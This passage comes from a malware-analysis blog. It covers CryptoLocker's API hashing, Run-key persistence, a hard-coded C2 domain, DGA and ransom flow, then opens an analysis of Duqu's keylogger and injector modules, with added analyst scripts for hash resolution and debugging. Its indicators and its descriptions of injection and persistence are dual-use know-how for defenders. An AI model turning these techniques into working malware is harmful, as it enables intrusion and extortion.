<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPwpd_PDhntKiyrSgL8ZHweuj098qrqa1Jx2K7eGKC_z4KWVMu_mJD39Jkl2K-aiXm63jxKuc7K8PIFbL7pk4FdqLtsgmEbyEq3QmOflfBE8DEIVGPnj6w9UXYQ0Z1HTFk8_93iZSsT8P8/s1600/Self_Modifying.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPwpd_PDhntKiyrSgL8ZHweuj098qrqa1Jx2K7eGKC_z4KWVMu_mJD39Jkl2K-aiXm63jxKuc7K8PIFbL7pk4FdqLtsgmEbyEq3QmOflfBE8DEIVGPnj6w9UXYQ0Z1HTFk8_93iZSsT8P8/s640/Self_Modifying.PNG" width="640" /></a></div>
<br />
In the first/original binary, the APIs the malware needs are stored as hashes, and their addresses are found by walking the exports of the corresponding DLL. In this case, it only needs kernel32.dll to decrypt itself. This technique is commonly seen in packers, encryptors and malware nowadays to make the life of a malware reverser a little bit harder:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtNR2OVMGQ5JMeQm4gc2uSDdetzq1WWLiOUOqOx97GnW2-02mvqHcnV72z6q9LZrxoC1uavW_v6-v2dH_dVNii0g4pQLU7I4TS2bwPbwuVbmscq8hOUmjceredBM1nlvkKDoEc-vgZjAeO/s1600/Checking_Hash.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtNR2OVMGQ5JMeQm4gc2uSDdetzq1WWLiOUOqOx97GnW2-02mvqHcnV72z6q9LZrxoC1uavW_v6-v2dH_dVNii0g4pQLU7I4TS2bwPbwuVbmscq8hOUmjceredBM1nlvkKDoEc-vgZjAeO/s640/Checking_Hash.PNG" width="640" /></a></div>
<br />
0x000D4E88 - kernel32.dll<br />
0x003560DA - LoadLibraryExA<br />
0x000E3142 - VirtualAlloc<br />
0x0038D13C - VirtualProtect<br />
0x00348BFA - GetProcAddress<br />
0x000068AE - FlsFree<br />
<br />
Above are the APIs needed to map the embedded encrypted PE image into memory. Once mapped, the decryption routine runs to reveal the embedded PE image. This new PE image is written over the original binary, and control is passed to it. I dumped this new PE image using Procdump and found that this new file has a yellow key icon. Here's the code that does the said routine:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaJcq3wJAwOLhbduQKTRUkChQFkcYpIEBZ_dTevTmZs-AoE2PLiIaVdgjUFk0UJLNzLgLT-tFFJxN4Z6oRtsQFNRaDHRee931oAH7KRTEqiUlTPJ-3Gsf87OuBmzprQPnxefNIK_QWUPSz/s1600/PassingControl.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaJcq3wJAwOLhbduQKTRUkChQFkcYpIEBZ_dTevTmZs-AoE2PLiIaVdgjUFk0UJLNzLgLT-tFFJxN4Z6oRtsQFNRaDHRee931oAH7KRTEqiUlTPJ-3Gsf87OuBmzprQPnxefNIK_QWUPSz/s640/PassingControl.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
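Hash-based API resolution, used both by this sample and by the shellcode in the PDF post above, is something the analyst has to reverse in the other direction: given the hashes, recover the names. The following is an added example (not code from either post): a small resolver that tries common name-hashing algorithms against a constructed export list. The algorithm these samples actually use is not given on the page, so the candidate algorithms are assumptions.<br />

```python
"""Map API-name hashes pulled from a sample back to export names.
Added analyst tooling: not code from the original posts.  The hashing
algorithm the samples use is not stated, so the candidate algorithms
below are assumptions; the export list is a constructed sample built
from the API names the posts mention."""

MASK32 = 0xFFFFFFFF


def ror13(name):
    """Classic ROR-13 additive hash over the ASCII bytes of the name."""
    h = 0
    for c in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & MASK32
        h = (h + c) & MASK32
    return h


def ror13_nul(name):
    """ROR-13 variant that also folds in the terminating NUL byte."""
    return ror13(name + "\0")


def djb2(name):
    """Bernstein's djb2: h = h * 33 + c, starting at 5381."""
    h = 5381
    for c in name.encode("ascii"):
        h = (h * 33 + c) & MASK32
    return h


def fnv1a(name):
    """32-bit FNV-1a."""
    h = 0x811C9DC5
    for c in name.encode("ascii"):
        h = ((h ^ c) * 0x01000193) & MASK32
    return h


CANDIDATES = {"ror13": ror13, "ror13_nul": ror13_nul, "djb2": djb2, "fnv1a": fnv1a}

# Constructed export list: the names both posts resolve, plus the module name.
EXPORTS = [
    "kernel32.dll", "LoadLibraryExA", "VirtualAlloc", "VirtualProtect",
    "GetProcAddress", "FlsFree", "ExitProcess", "DeviceIoControl",
    "CreateFileA", "GetCurrentProcessId", "LoadLibraryA", "WinExec",
    "WriteFile", "CloseHandle", "GetTempPathA", "GetTempFileNameA",
    "GetFileSize", "ReadFile", "SetFilePointer",
]

# Hash values quoted in the CryptoLocker post (their algorithm is unknown).
PAGE_HASHES = [0x000D4E88, 0x003560DA, 0x000E3142, 0x0038D13C, 0x00348BFA, 0x000068AE]


def build_table(hash_fn, names):
    """Precompute hash -> name for one candidate algorithm."""
    return {hash_fn(n): n for n in names}


def resolve(hashes, names, candidates=CANDIDATES):
    """Try every candidate algorithm and return (best_algorithm, {hash: name})
    for the one that explains the most hashes; (None, {}) if none matches."""
    best_alg, best_hits = None, {}
    for alg, fn in candidates.items():
        table = build_table(fn, names)
        hits = {h: table[h] for h in hashes if h in table}
        if len(hits) > len(best_hits):
            best_alg, best_hits = alg, hits
    return best_alg, best_hits


if __name__ == "__main__":
    alg, hits = resolve(PAGE_HASHES, EXPORTS)
    if alg is None:
        print("no candidate algorithm explains the quoted hashes; "
              "recover the routine from the sample and add it to CANDIDATES")
    for h, name in hits.items():
        print("0x%08X -> %s (%s)" % (h, name, alg))
```

When none of the candidates matches, the right move is to lift the hashing routine from the sample's resolver loop and add it as a new entry in CANDIDATES.<br />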
Continuing the analysis, it creates mutex names with the following formats:<br />
Global\<random_name1><br />
Local\<random_name2><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaO1tHigWttRRmS1ccrUlmVczOOx_iP0D6tgbG7ifm5aX0ArVlVsEyRFMOAr8gorK3u-60CSPufVA4bgojCXN5ZXnOL94E4hMKRwH67vL4M1YI3HmMYVYwgov6aGTXAmwPt2PFCfhpWUMV/s1600/mutex_name.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaO1tHigWttRRmS1ccrUlmVczOOx_iP0D6tgbG7ifm5aX0ArVlVsEyRFMOAr8gorK3u-60CSPufVA4bgojCXN5ZXnOL94E4hMKRwH67vL4M1YI3HmMYVYwgov6aGTXAmwPt2PFCfhpWUMV/s640/mutex_name.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
The random names are generated from a hash of the path where the file will be dropped, combined with a DWORD key; each name is generated with a different DWORD key. It uses the Microsoft <a href="http://msdn.microsoft.com/en-us/library/ms721572.aspx#_security_cryptoapi_gly">CryptoAPIs</a> to compute the hash.<br />
<br />
This malware sample drops a copy of itself as %APPDATA%\Local\<random_file_name>.exe, where random_file_name is generated in the same way as the mutex names.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikMoJ7MMgtzT7aL7yIy5HF8QzyEu-kinO-ODROWph_GfPVr41LeYbyDJiOjFOoaZtJtzX580gGwxqiEcQ-qnWMWPToHD54CKuREzvj0p5VBUifrpOax1iLRyuR1JT-EJzqUZ1o992siz8O/s1600/drop_itself.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikMoJ7MMgtzT7aL7yIy5HF8QzyEu-kinO-ODROWph_GfPVr41LeYbyDJiOjFOoaZtJtzX580gGwxqiEcQ-qnWMWPToHD54CKuREzvj0p5VBUifrpOax1iLRyuR1JT-EJzqUZ1o992siz8O/s640/drop_itself.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once it has dropped a copy of itself, it spawns the newly created copy as a new process with the following command-line parameter:</div>
<br />
%APPDATA%\Local\<random_file_name>.exe -r%PATH_OF_CURRENT_EXECUTION%\<random_file_name>.exe<br />
<br />
This command line causes the new process to delete the file %PATH_OF_CURRENT_EXECUTION%\<random_file_name>.exe<br />
<br />
Now, to debug this new child process, you may follow these steps:<br />
<br />
NOTE: Don't step over the CreateProcess API yet. Do the following first (EB FE is a two-byte jump to itself, so the child spins at its entry point until you attach and restore the original bytes):<br />
1. Open the newly created file in any binary editor.<br />
2. Go to the entry point.<br />
3. Write down the first 2 bytes.<br />
4. Change the first 2 bytes to EB FE.<br />
5. Save it.<br />
6. Go back to the debugged parent process.<br />
7. Step over the CreateProcess API.<br />
8. Open a new OllyDbg instance.<br />
9. Attach the newly created process to OllyDbg.<br />
10. Go to the entry point.<br />
11. Restore the original 2 bytes.<br />
12. Continue debugging the child process.<br />
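The EB FE trick can be scripted so that the original bytes are recorded and put back mechanically instead of by hand in a hex editor. The following is an added example, not code from the original post: a minimal PE32 entry-point patcher using only the standard library. The PE it operates on is a constructed stub, not the malware sample.<br />

```python
"""Patch a PE's entry point with EB FE (jmp $) so a freshly spawned child
process spins until a debugger is attached, then restore the original bytes.
Added analyst tooling, not code from the original post.  The sample PE built
below is a constructed minimal image, not the malware."""
import struct

JMP_SELF = b"\xEB\xFE"  # jmp short -2: the process loops at its entry point


def _section_table(data):
    """Yield (virtual_address, virtual_size, raw_size, raw_ptr) per section."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    sect_off = e_lfanew + 24 + opt_size        # 4 (sig) + 20 (FileHeader)
    for i in range(num_sections):
        base = sect_off + 40 * i
        vsize, vaddr, rsize, rptr = struct.unpack_from("<IIII", data, base + 8)
        yield vaddr, vsize, rsize, rptr


def entry_point_rva(data):
    """AddressOfEntryPoint sits at offset 16 of the optional header in both
    PE32 and PE32+, so this works for either."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return struct.unpack_from("<I", data, e_lfanew + 24 + 16)[0]


def rva_to_offset(data, rva):
    """Translate an RVA to a file offset via the section table."""
    for vaddr, vsize, rsize, rptr in _section_table(data):
        if vaddr <= rva < vaddr + max(vsize, rsize):
            return rva - vaddr + rptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def patch_entry(data):
    """Return (patched_image, original_two_bytes); keep the latter for step 11."""
    off = rva_to_offset(data, entry_point_rva(data))
    original = bytes(data[off:off + 2])
    patched = bytearray(data)
    patched[off:off + 2] = JMP_SELF
    return bytes(patched), original


def restore_entry(data, original):
    """Put the recorded two bytes back at the entry point."""
    off = rva_to_offset(data, entry_point_rva(data))
    restored = bytearray(data)
    restored[off:off + 2] = original
    return bytes(restored)


def build_sample_pe():
    """Constructed minimal PE32 with one .text section (not a real binary)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1010)        # AddressOfEntryPoint
    raw_ptr = 0x200
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200,
                          raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + file_hdr + bytes(opt) + section
    headers += b"\0" * (raw_ptr - len(headers))
    text = bytearray(0x200)
    text[0x10:0x14] = b"\x55\x8B\xEC\xC3"           # push ebp; mov ebp,esp; ret
    return headers + bytes(text)


if __name__ == "__main__":
    pe = build_sample_pe()
    patched, saved = patch_entry(pe)
    print("entry RVA 0x%x at file offset 0x%x, saved bytes %s"
          % (entry_point_rva(pe), rva_to_offset(pe, entry_point_rva(pe)), saved.hex()))
    assert restore_entry(patched, saved) == pe
```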
<br />
This newly created process is multi-threaded and carries out the rest of its malicious deeds. It creates the following registry entries as part of its auto-run mechanism:<br />
<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\Run<br />
CryptoLocker="%APPDATA%\Local\<random_file_name>.exe"<br />
<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce<br />
*CryptoLocker="%APPDATA%\Local\<random_file_name>.exe"<br />
<br />
On this malware sample, it will attempt to connect to the following hard-coded domain:<br />
<br />
xqmrainncxrwho.net<br />
<br />
After that, it starts generating domain names using a Domain Generation Algorithm (DGA). The algorithm is based on the current system date (year, month and day) and some hard-coded constants. It generates a 14-character domain name and appends one of the following top-level domains (TLDs):<br />
<br />
.net<br />
.biz<br />
.ru<br />
.org<br />
.co.uk<br />
.info<br />
.com<br />
<br />
Once a domain is generated, it sends the following HTTP request:<br />
<br />
POST /home/ HTTP/1.1<br />
Accept: */*<br />
Host: <random_generated_domain><br />
Connection: Close<br />
<br />
If the server responds OK, it creates a BMP image file on the desktop with a randomly generated name. This image file contains the URL where you can download a copy of CryptoLocker:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK8PhPr7rMGvJRR0Qv-VukmikVrDV5C1pz1nb8uxd187G4DkNEb_jibTtvTKzZHJUHf9crLMA-nvf9pVO7tgejwSPgGtm2tbKozF08pZgfeF7cX5HxS_qTCdowCxB6J7j4Ld2Cu1JOMyve/s1600/picture_message.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK8PhPr7rMGvJRR0Qv-VukmikVrDV5C1pz1nb8uxd187G4DkNEb_jibTtvTKzZHJUHf9crLMA-nvf9pVO7tgejwSPgGtm2tbKozF08pZgfeF7cX5HxS_qTCdowCxB6J7j4Ld2Cu1JOMyve/s400/picture_message.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
It then displays its GUI containing the ransom message. The user needs to pay USD300 to recover the encrypted documents. The payment methods it accepts are:<br />
<br />
MoneyPak<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cqWxxKi6wlDm1CyoTA2ofs8SSMOeT6ERg_Tt4ef6m-9snDh2ejH0iQSz2jmm8qekpb_H-dQX5rKmqnqhq4wlypG-kAE32WZ5l1abK-mC7Kee_D-j7cHwzHxwpU3N3m3i_Nd1PMbnLDu2/s1600/moneypak.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_cqWxxKi6wlDm1CyoTA2ofs8SSMOeT6ERg_Tt4ef6m-9snDh2ejH0iQSz2jmm8qekpb_H-dQX5rKmqnqhq4wlypG-kAE32WZ5l1abK-mC7Kee_D-j7cHwzHxwpU3N3m3i_Nd1PMbnLDu2/s320/moneypak.PNG" width="320" /></a></div>
<br />
Bitcoin<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRUeq17nB_BCNpfAC70xZFycSDi3Us-2wHPgzkY-RFutpby0MSYMJazpNZ4q1SE2hTpbuOqHybxqUPBM2KxY5ReN0j_UsLGQQkVerEN2gwFlmeIBfMrAh2X2SAId8pgesRJVn6WgaXskrj/s1600/Bitcoin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRUeq17nB_BCNpfAC70xZFycSDi3Us-2wHPgzkY-RFutpby0MSYMJazpNZ4q1SE2hTpbuOqHybxqUPBM2KxY5ReN0j_UsLGQQkVerEN2gwFlmeIBfMrAh2X2SAId8pgesRJVn6WgaXskrj/s320/Bitcoin.PNG" width="320" /></a></div>
<br />
<br />
This malware encrypts files using the RSA algorithm. It encrypts every file it finds with one of the following extensions:<br />
<br />
*.odt *.ods *.odp<br />
*.odm *.odc *.odb<br />
*.doc *.docx *.docm<br />
*.wps *.xls *.xlsx<br />
*.xlsm *.xlsb *.xlk<br />
*.ppt *.pptx *.pptm<br />
*.mdb *.accdb *.pst<br />
*.dwg *.dxf *.dxg<br />
*.wpd *.rtf *.wb2<br />
*.pdf *.mdf *.dbf<br />
*.psd *.pdd *.eps<br />
*.ai *.indd *.cdr<br />
*.dng *.3fr *.arw<br />
*.srf *.sr2 *.bay<br />
*.crw *.cr2 *.dcr<br />
*.kdc *.erf *.mef<br />
*.mrw *.nef *.nrw<br />
*.orf *.raf *.raw<br />
*.rwl *.rw2 *.r3d<br />
*.ptx *.pef *.srw<br />
*.x3f<br />
<div>
<br /></div>
<br />Anonymoushttp://www.blogger.com/profile/09301814992710231875noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-15092430747767657302013-11-14T00:09:00.001-08:002013-11-14T00:09:49.676-08:00DETAILED ANALYSIS OF Trojan.Win32.Duqu: The Key Logger Module<ol style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">INTRODUCTION</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Duqu malware is a collection of malware components that together provide services to attackers. It may arrive as a Microsoft Word document (.doc) that exploits the Win32k TrueType font parsing engine to gain code execution.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">This document will be solely focused on the key logger component of Duqu.</span></span></div>
<ol start="2" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">SUMMARY</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The file under study is the info stealer/key logger component,</span> <span style="font-size: 11pt;"><b><i>“a part”</i></b></span> <span style="font-size: 11pt;">of the APT (Advanced Persistent Threat) malware known as Duqu.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The MD5 hash of the file is 9749d38ae9b9ddd81b50aad679ee87ec. Vipre detects this as Trojan.Win32.Duqu.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The detailed analysis will be focused on three parts:</span></span></div>
<br />
<ul>
<li><span style="font-size: 11pt;">9749d38ae9b9ddd81b50aad679ee87ec – main executable</span></li>
<li><span style="font-size: 11pt;">f5ee03fed0133bb06d4cc52b0232fec0 – executable injector module</span></li>
<li><span style="font-size: 11pt;">9a9e77d2b7792fbbddcd7ce05a4eb26e – dll infostealer module</span></li>
</ul>
<br />
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The original executable</span> <span style="font-size: 11pt;"><i>9749d38ae9b9ddd81b50aad679ee87ec</i></span> <span style="font-size: 11pt;">(exe) has two components, f5ee03fed0133bb06d4cc52b0232fec0 (exe) and 9a9e77d2b7792fbbddcd7ce05a4eb26e (dll), which are stored encrypted within its body.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>9749d38ae9b9ddd81b50aad679ee87ec</i></span> <span style="font-size: 11pt;">is responsible for setting up the other two. It acts as a command console that expects command-line arguments. The usage is as follows:</span></span><br />
<i style="color: #010101; font-family: Calibri; font-size: 11pt; text-align: -webkit-auto; text-indent: 13mm;">9749d38ae9b9ddd81b50aad679ee87ec.exe xxx <optional parameters></i></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>optional parameters are:</i></span></span></div>
<br />
<ul>
<li><span style="font-size: 11pt;">/delme - deletes the executable.</span></li>
<li><span style="font-size: 11pt;">/v - verbose logging for its own debugging purposes.</span></li>
<li><span style="font-size: 11pt;">/quit - terminates the spawned process (default lsass.exe) that holds the injected .tmp file.</span></li>
<li><span style="font-size: 11pt;">/restart - restarts or spawns the process (default lsass.exe) with the injected .tmp file.</span></li>
<li><span style="font-size: 11pt;">/in <config file> - config file used for issuing commands on what data to steal and record to its log file; if not specified, the default config is loaded from one of its resources.</span></li>
<li><span style="font-size: 11pt;">/out <filename> - output file for its encrypted logs; the default is ~DQx.tmp in the %temp% folder if not specified.</span></li>
</ul>
<br />
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">It chooses which process to inject its code into: either a known antivirus process or one of several known Windows processes. Once a target process is chosen, it spawns a suspended copy of that process and redirects its entry point to the entry point of its injector module (</span><span style="font-size: 11pt;"><i>f5ee03fed0133bb06d4cc52b0232fec0</i></span><span style="font-size: 11pt;">) before resuming it.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>f5ee03fed0133bb06d4cc52b0232fec0</i></span> <span style="font-size: 11pt;">is responsible for injecting the dll module (</span><span style="font-size: 11pt;"><i>9a9e77d2b7792fbbddcd7ce05a4eb26e</i></span><span style="font-size: 11pt;">) into the newly spawned process as a thread. As a sign of infection, a “sortxxxx.nls” thread (where “xxxx” is any random hex number) will be present within the process.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>9a9e77d2b7792fbbddcd7ce05a4eb26e</i></span> <span style="font-size: 11pt;">on the other hand steals information about the system and logs it to a tmp file. A total of 9 information-stealing routines may be executed, identified by the following command codes:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">65h: list running processes and get account details</li>
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">66h: get available drives and information</li>
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">68h: take a screenshot</li>
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">69h: get various network information</li>
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">67h: log keyboard strokes</li>
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">6Ah: enumerate opened windows</li>
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">6Bh: enumerate network shares</li>
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">6Dh: list available files</li>
<li style="color: #010101; font-family: Calibri; font-size: 11pt;">6Eh: enumerate computers on the domain.</li>
</ul>
<br />
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">By default, based on its configuration file, it executes only 8 of these routines; routine 6Eh (enumerate computers on the domain) is not executed.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">All the gathered data are compressed with the bzip2 algorithm and then stored in a temp file, ~DQxx.tmp (where xx is any hex number), located in the %TEMP% directory.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 32mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<br /></div>
<ol start="3" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">FLOWCHART</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Here is a diagram of the malware’s system infection routine.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXpV7tyPlHofphV8jBjefYTaagQdsDVGQvoMTrd4nDaEtCn5FmyQTznEcuCZglyGzs9JDpM20HuBFMLaAxjPI8xq8fUTSaeQVI9pcinZCb5n2RoZD0NBw0OMsONzEfkbHeXbhPu4uu/s1600/keylogger_flowchart.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXpV7tyPlHofphV8jBjefYTaagQdsDVGQvoMTrd4nDaEtCn5FmyQTznEcuCZglyGzs9JDpM20HuBFMLaAxjPI8xq8fUTSaeQVI9pcinZCb5n2RoZD0NBw0OMsONzEfkbHeXbhPu4uu/s320/keylogger_flowchart.png" width="203" /></a></div>
<br /></div>
<ol start="4" style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;" type="I">
<li style="color: #010101; font-family: Calibri; font-size: 11pt; font-weight: bold; margin-left: -7pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">INITIAL ANALYSIS</span></div>
</li>
</ol>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 3.52mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">At first glance, the file is a Win32 executable with the GUI subsystem that runs on an Intel 386 or later processor.</span></span><br />
